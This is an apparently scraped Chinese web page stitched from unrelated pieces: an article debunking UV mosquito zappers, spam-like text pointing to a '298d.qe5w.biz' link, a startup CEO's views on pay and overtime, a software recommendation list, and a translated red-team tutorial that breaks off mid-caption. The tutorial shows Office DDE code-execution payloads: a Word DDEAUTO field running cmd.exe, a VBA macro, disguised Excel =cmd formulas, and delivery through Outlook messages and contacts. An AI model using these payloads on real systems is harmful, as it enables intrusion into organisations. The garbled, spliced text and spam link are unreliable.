不是www网咯的298dd故障,那是为啥298dd灯不上www.211dd.com网址页的
点击联系发帖人
时间:2018-04-14 09:25
紫外线灭蚊灯不能消灭蚊子!这是科学家早就反复实验证实的。在1997年佛罗里达的一项实验中,紫外线灭蚊灯亮了一晚上,共电死10000多只飞虫,其中8只是蚊子,只有万分之八,你妹啊!(╯°Д°)╯︵ ┻━┻科学家评论到:这尼玛纯粹是浪费钱,灭蚊灯……广告绝对坑爹,事实上,这货不仅灭不了蚊子,还招惹来更多的蚊子!灭蚊灯杀死的是成千上万对人类无害的益虫。"They are a total waste of money. Bug zappers will not control mosquitoes or other biting insects such as horseflies, dog flies or deer flies," said Jonathan Day, associate professor of entomology with the UF's Institute of Food and Agricultural Sciences."They simply do not work as advertised. In fact, bug zappers actually make things worse by attracting more mosquitoes into your yard, and they end up killing thousands of beneficial insects that don't bother people."见最后的参考文献紫外线灭蚊灯里电死的是什么?看到这里,有人可能会说:不可能!我的灭蚊灯里一堆死蚊子!其实吧,那很可能不是蚊子,而是蚊子的表亲——摇蚊,它是不吸血的。因为蚊子和摇蚊长得实在太像,绝大多数人无法分辨蚊子和摇蚊。你猜下图中哪些是蚊子,哪些是摇蚊?事实上,上面全是摇蚊,没有一个吸血的蚊子!属于摇蚊科,俗称non-biting midges,翻译过来就是不叮咬的蠓。摇蚊在南方比北方更常见一些,因为它们喜欢在湖泊密集的地方大量繁殖,住在水边上的人应该深有体会。摇蚊是生态系统中很重要的一环,因为数量极为庞大,他的幼虫和成虫是鱼、虾、蟹等水生动物的食物。在中,就有专门的摇蚊形状鱼钩,可见鱼类多么喜欢摇蚊。不了解飞蝇钓的可以去看大帅哥布拉德·皮特主演的经典电影《》,该片曾获多项奥斯卡提名,最终获得第65届奥斯卡最佳摄影奖。常见的吸血蚊虫我们要消灭的目标是蚊子,它属于蚊科Culicidae,其中只有雌蚊才会吸血。紫外线灯对它没有作用。还有一种蠓,也是吸血的叮咬蠓,属于蠓科,俗称小咬。紫外线灯对它也没有作用!更多实验证明紫外线灭蚊灯并不吸引蚊子除了开头提到的实验,其实早在1982年,科学家就在家庭后院里用紫外线灭蚊灯做实验,电死了3212 只飞虫,只有3.3%的雌蚊,其他被电死的96%以上的飞虫不是吸血的雌蚊!1996年,科学家又用紫外线灭蚊灯捕获了13789只飞虫中,其中只有31只是吸血的飞虫,仅占总数的0.22%,这31只还是吸血的蚊子再加上吸血的蠓的总和!为什么紫外线灯会吸引飞虫?是不是因为昆虫的趋光性?趋光性在很多情况下是误读,推荐阅读《》里的回答。紫外线灯的作用是干扰了飞虫们的导航系统,因为很多白天飞行的飞虫靠太阳产生的紫外线导航。摇蚊也是在白天活动的,雄成虫会在清晨或黄昏群飞。紫外线灯发出的光让摇蚊等飞虫误以为天亮了,起飞后又因为光源不是平行光而按照等角螺线飞行,最终聚集在灭蚊灯附近,不小心接触电网被大量电死。蚊子在白天基本是不活动的,因为蚊子有躲避强光的习性。大家打蚊子都知道,黑夜里听到蚊子声,如果突然开灯,蚊子就会停止飞行,落到墙上。在没有人造光源的自然环境中,夜晚根本就没有紫外线光源!你说蚊子在找不到紫外线光源的黑夜里,要紫外线干嘛呢?答案只有一个,就是蚊子压根就不喜欢紫外线,更不会被紫外线吸引!只是因为紫外线灯“吸引”了大量摇蚊,让人们错误的认为吸血蚊子喜欢紫外线,这个张冠李戴的冤假错案让无数可怜的摇蚊做了蚊子的替死鬼,也让消费者浪费了无数的电和钱。其实真正能吸引蚊子的是动物和人产生的二氧化碳、气味和红外线。为什么室内没人的时候,灭蚊灯会捕捉到几只蚊子?蚊子是被灯管发热所产生的红外线吸引,而不是被紫外线吸引。如果室内有人,蚊子就会被人吸引,紫外线灭蚊灯是木有吸引效果的。下图是人和灭蚊灯的红外线热像图,当人和灭蚊灯在一起时,灭蚊灯的热量真的是小巫见大巫。所以灭蚊灯与其做成紫外线灯,还不如做成模仿人类血管热量散发的红外线灯,在室内没人的时候还可以灭一点儿蚊子,这样也能减少紫外线照射对人体的伤害。如何解释灭蚊灯电死很多蚊子的照片?首先就像前面所说,那些蚊子可能绝大多数是摇蚊,其次这些照片的拍摄地多半会满足以下一个或多个条件:水边,例如附近有湖泊、水库等室外,例如灭蚊灯放置在院落、野外、乡村等南方,例如黄河以南的温暖湿润地区如果是在干燥的北方城市里,特别是在室内,灭蚊灯连摇蚊都抓不到,更何况真正的蚊子!要灭蚊,建议还是使用电蚊香,经济又实惠。但是再愤怒也不要学下面这位喷火灭蚊。真正的灭蚊大杀器土豪专用激光灭蚊系统蚊子被击落的过程慢动作视频
这是其发明者在TED 2010年会上的演讲。
已经买了灭蚊灯怎么办?首先,不建议你退货,这是为了我的安全!毕竟淘宝上有一大堆商家靠这个吃饭,你如果退货,我铁定会被他们骂死!X﹏X这也不利于创造更多就业机会和GDP,更不利于建设和谐社会!其次,灭蚊灯有很好的心理安慰作用!虽然杀不死蚊子,但至少杀死了蚊子的表兄妹。^_^||| 痒痒的抓心挠肝的时候,噼啪、噼啪!电死你妹的也可以出出气,反正表妹也是妹!很多中药、保健品本质上就是安慰剂,不一样卖的很好吗?所以就把灭蚊灯当安慰剂吧!结论吸血的蚊子不会被紫外线灯吸引。紫外线灯“ 吸引 ”的是白天靠紫外线导航的飞虫,例如摇蚊。紫外线灯杀死大量不吸血的摇蚊,这让很多人误以为紫外线可以吸引吸血蚊子。使用电蚊香片比灭蚊灯更有效。如果我是灭蚊灯老板,知道大势已去,就会把所有存货的蓝灯全改成红灯,并到处说紫外线灯是骗人的,红外线灭蚊才是科学的,云云……这叫走自己的路,让别人无路可走!One more thing…看完了别忘支持点赞啊,让更多人知道真相!参考文献5.5K221 条评论分享收藏文章被以下专栏收录每个人的心智中都有陷阱,只是我们身陷其中无法感知。走出陷阱就是对心智的解放,好的答案可以拆掉思维习惯里的条条框框,可以突破认知能力的玻璃天花板,可以飞到更高维度向下观察。
拆除难免会痛,有时是反直观、反常识、反舒适区的,会痛得让人大骂:“谁让你拆的?滚!”
先前为了自嘲,索性把专栏名从“张英锋说”改为“锋之蛊”。现在为了弘扬正能量,改名“自由心智”:P
所以关注本专栏的人,都是有好奇心和宽容心的人,感谢你们。拒绝访问 | www.sglynp.com | 百度云加速
请打开cookies.
此网站 (www.sglynp.com) 的管理员禁止了您的访问。原因是您的访问包含了非浏览器特征(40b527bfaad64370-ua98).
重新安装浏览器,或使用别的浏览器厅难www确定298dd聚体的,恢复日期298dd向似的com怎么找_百度知道
厅难www确定298dd聚体的,恢复日期298dd向似的com怎么找
我有更好的答案
很简单通过【298d.qe5w.biz】即可联机
为您推荐:
其他类似问题
换一换
回答问题,赢新手礼包
个人、企业类
违法有害信息,请在下方选择后提交
色情、暴力
我们会通过消息、邮箱等方式尽快将举报结果通知您。我是一个中型创业型公司的CEO,目前管理的公司约200人左右,经历了公司三年从几个人到现在的过程,我曾经在BAT工作过,也在国企工作过,也在小公司工作过,做过专员,做过经理,做过总监,遇到过很好的老板,也遇到过看似牛逼但超级不靠谱的老板,所以我对做员工和做老板两方面都深有体会,我想我有资格来回答一下这个题目。&/p&&p& 先说说我自己的看法,部分认同该文章的观点,高票答案完全站在一个员工的角度来回答,未免有失偏颇,我参照高票答案的回答,我从我的角度也一条条来回答一下。&/p&&p&1、&b&“我非常赞同高薪养人,但我不认同企业一开始就高薪,你钱都还没赚回来,你就高薪,你知道赚钱是需要过程的,当过程的结果都还没到来的时候,你就死掉了”&/b&&/p&&p&这条我是同意的,我从来不招那种简历看似很华丽,但薪资要求非常高的员工,第一:你不知道他以往的华丽的职业经历到底是他的平台给他的加分还是他自己的能力,第二:你同样不知道他是否到新公司后能适应新的环境,我们很少空降高管,我们公司不管从创始人到基层,薪资在行业内只能算中上水平(大概比中等水平高20%),公司有比较严格的按等级晋升制度,你在什么等级,就会大概是什么薪资,老员工每一年会有一次调薪机会,总体上来说新员工刚进来的时候不太可能比同等级的老员工薪资还要高,我的理念是,老员工才是最重要的,他们是公司的基石,新员工我可以不要,重新再找,老员工走掉一个,公司损失就会很大,所以绝对不能让老员工尤其是核心员工寒心。&/p&&p&2&b&、“有些企业老板,不知道从那个大佬那里听来的理论,要用最高的薪资聘请最优秀的人才。这个道理听里来不错,但能执行吗?”&/b&&/p&&p&跟上面一样,我也赞同这一条,创业型公司千万不能想着用最高的薪资聘请最优秀的人才,因为作为创业型公司的CEO,你的水平代表了这个公司的最高水平,你都不优秀,你不可能招的到招的起优秀的人才,我们最需要的是合适的薪资招到有忠诚度,愿意学习,可以在公司长期服务的员工,这才是创业公司最需要的,毕竟,创业公司最重要的是保证能活着,才有未来发展的机会。&/p&&p&3、&b&“为高薪而共同奋斗,别抱怨你的薪资低了,每个人其实都有自己的选择,你的收入不够高是因为你还不够努力。”&br&&/b&部分赞同这一条,确实应该整个公司的人为了高薪和共同奋斗,但奋斗的不是底薪,而是你在公司的地位和股权,我们公司实行全员持股(入职半年以上的员工都有机会拿期权),我们参考了华为的期权和虚拟受限股制度,期权采取分红方式,每个季度按照公司利润除以股价来做分红,虚拟受限股由员工出钱购买,也可以参与分红,并且可以享受公司利润增长,股份增值后的更多空间,有购买虚拟受限股的,我们给予更多升职和培养的机会,毕竟证明你对公司是认可的(目前公司大概有74%的员工购买了虚拟受限股),不够努力的员工确实在我们公司不会有太高的收入。&/p&&p&4、&b&“最近我招聘了一个新人,我问了他一些他之前公司情况,做的都是非常大的客户,也很有价值,他也说他们公司福利非常的好,对员工也宽容。但我最后问他为什么那么好的公司却要选择离开?他的回答让人乍舌,“公司垮了”。”&/b&&/p&&p&这个我也不同意,公司垮不垮和对员工是否宽容没有直接联系,这个是强行加到一起,不然你怎么解释那些老国企的老员工天天在公司划水,母公司照样赚大钱,公司是否能运营下去还是要看公司的市场竞争力,管理水平和整体的市场环境,和是否对员工宽容没有关系。&/p&&p&5、&b&“作为企业主,作为管理者,你要帮助员工成长,帮助员工获得更好的收入,体面的生活,这才是对他未来的负责。”&/b&&/p&&p&这句话说的并不是压榨员工,而是说要给员工尤其是基层员工更好的升职加薪预期和机会,我是这么做的,&/p&&p&第一:每年有年度调薪制度,人人都有机会加薪,只要你在现有的岗位上表现优秀;&/p&&p&第二:给基层员工设定标准和晋升计划,怎么样的标准才可以晋升是有比较规范的指标在指导的,如果你对现有的工作厌倦,我们同样可以提供调整岗位和方向的机会,比如我们公司就有原来做客服的员工后来因为兴趣调到设计部,后来又自学前端教程,经过一段时间培养升为前端工程师的,这期间这个员工的薪资翻了一倍多,而公司又节省了猎头费和招募新员工的时间成本,并且获得了员工的忠诚,同时也成为了公司基层员工的榜样和目标,所以管理者确实要帮助员工成长,才能获得更多员工的支持和忠诚。&/p&&p&第三:我们同样也实行末位淘汰制度,每个部门工作表现排最后的员工只要不是工作态度和工作纪律的问题,我们优先提供转岗机会,保证员工能找到能与自己兴趣和能力相匹配的方向。&/p&&p&6、&b&“创业中,我们最需要的是跑的快跑的稳,公司资源本身非常有限,人力一样的,你朝九晚五的,一天能做多少事?你怎么在残酷的市场竞争中获胜?华为为什么市值是BAT的总和还要多?我和他们曾有个几个月的业务交集,对华为员工来说,没有白天黑夜,只有什么时候完成任务。”&/b&&/p&&p&这个我不太认同,华为的成功并非完全因为的他们的加班制度,他们提供更高的行业薪资和愿意把股份分配给员工让员工愿意和公司一起成长才是成功的关键,说说我的做法:&/p&&p& 第一,不鼓励加班,鼓励员工所有工作尽量工作时间完成,正常节假日都放,福利给足,如果项目实在有需要的时候,经直接主管同意允许加班,给加班费,但是有一个例外,经理级别以上的不给加班费,第二条我会说到为什么这么做;&/p&&p&
第二,我把员工按层次做两个定位,经理级别以上的,我们看成是公司核心员工,是公司的合伙人,公司不会给加班费,你见过公司的创始人要求公司给加班费的吗?相反的是,我们会依照工作表现和在公司供职时间配发期权和虚拟受限股,所有的福利,期权发放都会向经理级别以上倾斜,保证经理以上的整体收入水平在行业内达到顶级水准。&/p&&p& 我作为员工的时候,也是很讨厌没事非得要呆在公司的制度,比如原来在阿里供职的时候,我就适应不了那种环境,平时就算没事,也需要呆在公司,直到你的主管走了,你才能走,基本上都是在晚上十点左右了,这样自己没有私人时间,上班的时候在磨洋工,我真的不觉得这样的制度是一个好的制度,阿里实际上有这方面的问题,他们一直是加班不给加班费的。&/p&&p&7、&b&“形成今日事今日毕的、企业文化。&/b&我调查了20多家倒闭的创业企业,后来我发现,他们都有一个共同的特点,除了老板,几乎没有人加班。&b&”&/b&&/p&&p&这条我不同意,我觉得一家好的公司的标准是反过来的,不是“除了老板,几乎没有人加班”,而是“除了老板不加班,其他人都愿意加班”,比如阿里,你什么时候见到过马云爸爸每天在公司加班到深夜?一个好的CEO是要培养一帮值得信任,扛得住责任的中高管,你要充分信任他们,大部分决定要由他们去判断,他们去执行,大多数时候,CEO在不在,都不影响这家公司的正常运作,这才是一家好公司,我基本上对公司的事情不先做决定,也不搞一言堂,你们来提建议和意见,我只负责最终的决策(少数十分重大的战略决策除外)。&/p&&p&作为员工的时候,我遇到过一个从房地产转行过来做互联网公司(O2O)的老板,他真的对互联网几乎一无所知,但是他传承了以前做房地产的习惯,什么都是一言堂,每天自己在公司加班到很晚(虽然我也不知道他加班能做什么),看某个员工的表现不是看能力,看业绩,而是先看他是不是跟他一样能加班,跟员工和高管谈话的时候有书记员在旁边做记录,每一句话都记下来,基本上员工很难就任何一个问题去说服他,最后这家公司的结局是员工离职率超高,老板把自己辛辛苦苦做房地产二十年的钱全都赔在了这家公司。&/p&&p&先回答到这里,其他我有想到的,或者评论里提到的,我再来慢慢回答。&/p&
我是一个中型创业型公司的CEO,目前管理的公司约200人左右,经历了公司三年从几个人到现在的过程,我曾经在BAT工作过,也在国企工作过,也在小公司工作过,做过专员,做过经理,做过总监,遇到过很好的老板,也遇到过看似牛逼但超级不靠谱的老板,所以我对做…
&p&良心软件三大特征:一是超好用!二是无广告!三是性价比高!&/p&&p&说说我近几年爱上的五款软件(直接在官网打开即可,都可免费使用,有的也有付费版)&/p&&hr&&h2&&b&简道云(地址:&/b&&a href=&//link.zhihu.com/?target=https%3A//www.jiandaoyun.com/%3Futm_source%3Dzhihu& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&www.jiandaoyun.com&/a&&b&)&/b&&/h2&&p&适合:适用于各行各业,超自由的工作效率提高神器~&/p&&p&这款软件是我今年才发现的神器,自从上手后,我有段时间基本逢人就安利!&/p&&p&我们公司平时人事需要收集订餐信息,在电脑浏览器上打开简道云→做好应用→然后绑定到企业微信/阿里钉钉/微信上,就能在手机上收集大家的订餐信息:&/p&&figure&&img src=&https://pic2.zhimg.com/v2-17cfca6b1d_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&2054& data-rawheight=&1188& class=&origin_image zh-lightbox-thumb& width=&2054& data-original=&https://pic2.zhimg.com/v2-17cfca6b1d_r.jpg&&&/figure&&p&除此外,像什么进销存、OA办公、客户关系管理的应用都可以用简道云制作,制作的过程也很简单,非常简单:&/p&&figure&&img src=&https://pic3.zhimg.com/v2-2d2cdb53cf0e646dd1e7a_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1268& data-rawheight=&794& class=&origin_image zh-lightbox-thumb& width=&1268& data-original=&https://pic3.zhimg.com/v2-2d2cdb53cf0e646dd1e7a_r.jpg&&&/figure&&p&应用都是随便自己控制,手机电脑都能用,也不用编程,超方便,推荐!&/p&&hr&&h2&&b&199it(地址:&a href=&//link.zhihu.com/?target=http%3A//www.199it.com/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&www.199it.com&/a&)&/b&&/h2&&p&适用:喜欢搜集和下载互联网报告的人&/p&&p&这个网站是去年参加一个线上互联网大会知道的,然后加入收藏夹后再也没删掉。如果你是互联网从业人员,可以经常上来看看报告,分析得很客观又浅显,不故弄玄虚不装逼:&/p&&figure&&img src=&https://pic1.zhimg.com/v2-81e4e0a01417bfdf4c90_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1040& data-rawheight=&630& class=&origin_image zh-lightbox-thumb& width=&1040& data-original=&https://pic1.zhimg.com/v2-81e4e0a01417bfdf4c90_r.jpg&&&/figure&&p&图片清晰度很高,艾瑞咨询等比较知名的调查报告分析平台的报告都有,还能免费获取原报告:&/p&&figure&&img src=&https://pic3.zhimg.com/v2-4d77c85ccd1a8c16b02d9a_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1007& data-rawheight=&467& class=&origin_image zh-lightbox-thumb& width=&1007& data-original=&https://pic3.zhimg.com/v2-4d77c85ccd1a8c16b02d9a_r.jpg&&&/figure&&p&整个页面也很干净,不会跳出乱七八糟的广告~听说爱看调查报告的人,智商都不会低。&/p&&hr&&h2&&b&iconfont(地址:&a href=&//link.zhihu.com/?target=http%3A//www.iconfont.cn/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&www.iconfont.cn&/a&)&/b&&/h2&&p&适用:需要下载png图标的设计师/PPT人&/p&&p&这个网站是阿里做的图标库网站,页面完全没广告:&/p&&figure&&img src=&https://pic1.zhimg.com/v2-60d37fecc45e0f8d8028_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1566& data-rawheight=&745& class=&origin_image zh-lightbox-thumb& width=&1566& data-original=&https://pic1.zhimg.com/v2-60d37fecc45e0f8d8028_r.jpg&&&/figure&&p&还能下载各种各样的图标PNG/AI原素材,就是设计师的福音~阿里果然财大气粗,市面上像这样支持免费下载PNG的网站,真的没几家。&/p&&figure&&img src=&https://pic3.zhimg.com/v2-11eec764decd11d9bb1e_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1049& data-rawheight=&721& class=&origin_image zh-lightbox-thumb& width=&1049& data-original=&https://pic3.zhimg.com/v2-11eec764decd11d9bb1e_r.jpg&&&/figure&&p&除了设计师以外,很多常常制作PPT的小伙伴也非常适用这个网站呢~&/p&&hr&&h2&&b&Screen to Gif(地址:&a href=&//link.zhihu.com/?target=http%3A//www.screentogif.com/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&www.screentogif.com/&/a&)&/b&&/h2&&p&适用:需要录制GIF图的小伙伴&/p&&p&看起来是个英文软件,其实支持中文版,可以切换成中文模式~&/p&&p&支持在线录制GIF图,还能控制帧数大小,加水印边框都随便你。(功能如下)&/p&&figure&&img src=&https://pic3.zhimg.com/v2-416e1d9b621874ade38406_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&717& data-rawheight=&210& class=&origin_image zh-lightbox-thumb& width=&717& data-original=&https://pic3.zhimg.com/v2-416e1d9b621874ade38406_r.jpg&&&/figure&&p&这款软件不仅没有广告,甚至不需要安装,直接下载下来打开就好,非常轻便的一款小软件,好用程度堪称同行第一:&/p&&figure&&img src=&https://pic3.zhimg.com/v2-01bb606f11f_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&904& data-rawheight=&228& class=&origin_image zh-lightbox-thumb& width=&904& data-original=&https://pic3.zhimg.com/v2-01bb606f11f_r.jpg&&&/figure&&hr&&blockquote&&i&这里本来应该有个软件推荐,但是……(hhh看评论区)&/i&&/blockquote&&figure&&img src=&https://pic2.zhimg.com/v2-1812add21c2bd6d379ccb9_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1050& data-rawheight=&177& class=&origin_image zh-lightbox-thumb& width=&1050& data-original=&https://pic2.zhimg.com/v2-1812add21c2bd6d379ccb9_r.jpg&&&/figure&&hr&&h2&&b&everything(地址:&a href=&//link.zhihu.com/?target=http%3A//www.voidtools.com/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&www.voidtools.com&/a&)&/b&&/h2&&p&适用:本地文件搜索神器&/p&&p&其实这款软件大家都推荐得很多了,不过我看到很多人截图都是英文版,everything是有中文版中文版中文版的!英语不好的小伙伴们不用担心~&/p&&figure&&img src=&https://pic1.zhimg.com/v2-17ff27ca3c_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1153& data-rawheight=&393& class=&origin_image zh-lightbox-thumb& width=&1153& data-original=&https://pic1.zhimg.com/v2-17ff27ca3c_r.jpg&&&/figure&&p&打开官网拉到最下面,下载就行了:(安装的时候语言模式选择中文)&/p&&figure&&img src=&https://pic4.zhimg.com/v2-96ea4cea77_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&914& data-rawheight=&281& class=&origin_image zh-lightbox-thumb& width=&914& data-original=&https://pic4.zhimg.com/v2-96ea4cea77_r.jpg&&&/figure&&figure&&img src=&https://pic3.zhimg.com/v2-1f90addfb824cfe_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&400& data-rawheight=&438& class=&content_image& width=&400&&&/figure&
良心软件三大特征:一是超好用!二是无广告!三是性价比高!说说我近几年爱上的五款软件(直接在官网打开即可,都可免费使用,有的也有付费版)简道云(地址:)适合:适用于各行各业,超自由的工作效率提高神器~这款软件是我今年才发现…
&p&微软的Office是在每个企业或组织中部署的常见应用程序。这种广泛的使用将微软的Office变成了一个可以用来执行攻击并使红队可以收集域哈希或执行任意代码的工具。&/p&&p&从历史上看,在微软的Office中执行代码是通过使用宏来执行的。然而,&a href=&https://link.zhihu.com/?target=https%3A//twitter.com/sensepost& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&SensePost&/a&发现了另一种使用DDE(动态数据交换)协议执行任意代码的方法。Office的产品内部有很多地方可以通过DDE来接受代码执行,本文将演示大部分这些攻击媒介。文章&a href=&https://link.zhihu.com/?target=https%3A//medium.com/red-team/dde-payloads-fcd& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&DDE Payloads&/a&可以与这篇文章一起用于生成有效载荷。&/p&&h2&&b&Word&/b&&/h2&&p&在微软Office Word中最简单的利用方法是插入字段码,这种方法由&a href=&https://link.zhihu.com/?target=https%3A//twitter.com/sensepost& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&SensePost&/a&发表的&a href=&https://link.zhihu.com/?target=https%3A//sensepost.com/blog/2017/macro-less-code-exec-in-msword/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&这篇文章&/a&描述过并且在公式内嵌入有效载荷。&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&Insert-& Quick Parts-& Field
&/code&&/pre&&/div&&figure&&img src=&https://pic1.zhimg.com/v2-069ed477fe90_b.jpg& data-size=&normal& data-rawwidth=&500& data-rawheight=&229& class=&origin_image zh-lightbox-thumb& width=&500& data-original=&https://pic1.zhimg.com/v2-069ed477fe90_r.jpg&&&figcaption&Word – 通过字段码的DDE&/figcaption&&/figure&&p&在括号内添加以下有效内容将在下次打开文件时弹出一些对话框。如果用户选择“是”选项,则有效载荷将被执行。&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&{DDEAUTO c:\\windows\\system32\\cmd.exe &/k
calc.exe&}
&/code&&/pre&&/div&&figure&&img src=&https://pic1.zhimg.com/v2-dac24e87abc67152f5aebf15a560092d_b.jpg& data-size=&normal& data-rawwidth=&500& data-rawheight=&320& class=&origin_image zh-lightbox-thumb& width=&500& data-original=&https://pic1.zhimg.com/v2-dac24e87abc67152f5aebf15a560092d_r.jpg&&&figcaption&Word – DDE有效载荷&/figcaption&&/figure&&p&或者,可以使用宏将有效载荷插入字段代码,正如&a href=&https://link.zhihu.com/?target=https%3A//twitter.com/cornerpirate& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Paul Ritchie&/a&在其&a href=&https://link.zhihu.com/?target=https%3A//www.secarma.co.uk/labs/is-dynamic-data-exchange-dde-injection-a-thing/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&博客中&/a&所描述的那样。&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&''' Programmatically inserts a new field code into a word document at the current selection index.
''' This is of type &wdFieldDDEAuto& which is a field code which executes Dynamic Data Exchange (DDE)
''' When the document is opened. This includes an example PoC which launches calc.exe
Public Sub FieldCodeFun()
' Payload String
Dim payload As String
payload = &&&c:\\windows\\system32\\calc.exe&& &&/c calc.exe&&&
' Insert our payload as a field code
Selection.Collapse Direction:=wdCollapseEnd
ActiveDocument.Fields.Add Range:=Selection.Range, _
Type:=wdFieldDDEAuto, Text:=payload
&/code&&/pre&&/div&&figure&&img src=&https://pic2.zhimg.com/v2-afe1b86fb07ea2b87a9dd9_b.jpg& data-size=&normal& data-rawwidth=&500& data-rawheight=&150& class=&origin_image zh-lightbox-thumb& width=&500& data-original=&https://pic2.zhimg.com/v2-afe1b86fb07ea2b87a9dd9_r.jpg&&&figcaption&Word -通过宏执行DDE&/figcaption&&/figure&&p&上面演示的有效载荷只是执行了计算器,但可以修改它来包含任何其他有效载荷。&/p&&p&&a href=&https://link.zhihu.com/?target=https%3A//twitter.com/securitysift& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Mike Czumak&/a&做了一个很好的研究,在他的&a href=&https://link.zhihu.com/?target=https%3A//www.securitysift.com/abusing-microsoft-office-dde/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&博客中&/a&讨论了从外部托管的另一个Word文档中加载恶意的DDE。INCLUDE字段码可以与这个攻击向量和外部URL结合使用。&/p&&figure&&img src=&https://pic1.zhimg.com/v2-cb02fd4170ceff7252ef_b.jpg& data-size=&normal& data-rawwidth=&500& data-rawheight=&203& class=&origin_image zh-lightbox-thumb& width=&500& data-original=&https://pic1.zhimg.com/v2-cb02fd4170ceff7252ef_r.jpg&&&figcaption&Word – 从另一个外部文档中加载DDE有效载荷&/figcaption&&/figure&&h2&&b&Excel&/b&&/h2&&p&在微软的Excel 中可以通过使用公式嵌入 DDE来执行有效载荷。以下两个公式都可以利用DDE执行代码(本例中为计算器),但是第二个公式会混淆对话框消息来更好的进行伪装来使其看起来更合理。&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&=cmd|'/c calc.exe'!A1
=MSEXCEL|'......\Windows\System32\cmd.exe /c
calc.exe'!''
&/code&&/pre&&/div&&figure&&img src=&https://pic1.zhimg.com/v2-aa4f4b08a3f6a82ca7ce_b.jpg& data-size=&normal& data-rawwidth=&500& data-rawheight=&171& class=&origin_image zh-lightbox-thumb& width=&500& data-original=&https://pic1.zhimg.com/v2-aa4f4b08a3f6a82ca7ce_r.jpg&&&figcaption&Excel – DDE命令&/figcaption&&/figure&&p&当用户打开恶意的Excel电子表格时,将出现以下对话框。&/p&&figure&&img src=&https://pic4.zhimg.com/v2-9f5c285cab5d337dd8ec_b.jpg& data-size=&normal& data-rawwidth=&500& data-rawheight=&94& class=&origin_image zh-lightbox-thumb& width=&500& data-original=&https://pic4.zhimg.com/v2-9f5c285cab5d337dd8ec_r.jpg&&&figcaption&Excel – DDE对话框&/figcaption&&/figure&&p&第二个公式仍将执行代码,但对话框中的消息内容将被修改,不是要求用户启动CMD.EXE,而是要求他启动MSEXCEL.exe。&/p&&figure&&img src=&https://pic1.zhimg.com/v2-9ad265ae6e768ffba97f96ca51a02ec7_b.jpg& data-size=&normal& data-rawwidth=&500& data-rawheight=&270& class=&origin_image zh-lightbox-thumb& width=&500& data-original=&https://pic1.zhimg.com/v2-9ad265ae6e768ffba97f96ca51a02ec7_r.jpg&&&figcaption&Excel -第二个命令执行DDE&/figcaption&&/figure&&h2&&b&Outlook&/b&&/h2&&p&在Outlook中有很多位置可以利用DDE执行有效载荷。根据情况的不同,每种方法都可能有用。例如,如果已经获得了域凭据,则可能更容易伪造电子邮件并发送给多个其他用户,以便在企业或组织内获得更多的Shell。&/p&&p&&b&消息&/b&&/p&&p&发送包含DDE的Outlook消息也可以自动执行代码。这同样适用于以附件形式发送的电子邮件。&/p&&figure&&img src=&https://pic3.zhimg.com/v2-8bbe07a92ae8bbc_b.jpg& data-size=&normal& data-rawwidth=&500& data-rawheight=&278& class=&origin_image zh-lightbox-thumb& width=&500& data-original=&https://pic3.zhimg.com/v2-8bbe07a92ae8bbc_r.jpg&&&figcaption&Outlook消息 – 执行DDE有效负载&/figcaption&&/figure&&p&但是,电子邮件信息需要以RTF格式(RTF)发送,并以RTF格式进行投递,因为某些邮件服务会将所有电子邮件转换为HTML,这将使DDE有效内容无效。&/p&&figure&&img src=&https://pic4.zhimg.com/v2-064ec865a7e38e556c117b0da42647f9_b.jpg& data-size=&normal& data-rawwidth=&500& data-rawheight=&188& class=&origin_image zh-lightbox-thumb& width=&500& data-original=&https://pic4.zhimg.com/v2-064ec865a7e38e556c117b0da42647f9_r.jpg&&&figcaption&Outlook消息 – DDE和RTF&/figcaption&&/figure&&p&当消息到达受害者用户的收件箱时,DDE将在该消息被浏览时执行。&/p&&figure&&img src=&https://pic4.zhimg.com/v2-a81b80c66424bed3dcfe8f30_b.jpg& data-size=&normal& data-rawwidth=&435& data-rawheight=&230& class=&origin_image zh-lightbox-thumb& width=&435& data-original=&https://pic4.zhimg.com/v2-a81b80c66424bed3dcfe8f30_r.jpg&&&figcaption&Outlook消息 – RTF电子邮件消息&/figcaption&&/figure&&p&&b&联系人&/b&&/p&&p&创建一个新的联系人或修改一个现有的联系人并将DDE载荷放入注释区域就可以导致执行代码。&/p&&figure&&img src=&https://pic2.zhimg.com/v2-a0539bea9da98a2addbbe22619acfa91_b.jpg& data-size=&normal& data-rawwidth=&500& data-rawheight=&231& class=&origin_image zh-lightbox-thumb& width=&500& data-original=&https://pic2.zhimg.com/v2-a0539bea9da98a2addbbe22619acfa91_r.jpg&&&figcaption&Outlook – 联系人备注中的DDE负载&/figcaption&&/figure&&p&联系人需要发送给目标用户。&/p&&figure&&img src=&https://pic4.zhimg.com/v2-2326fbd320fd57b53567_b.jpg& data-size=&normal& data-rawwidth=&500& data-rawheight=&203& class=&origin_image zh-lightbox-thumb& width=&500& data-original=&https://pic4.zhimg.com/v2-2326fbd320fd57b53567_r.jpg&&&figcaption&Outlook – 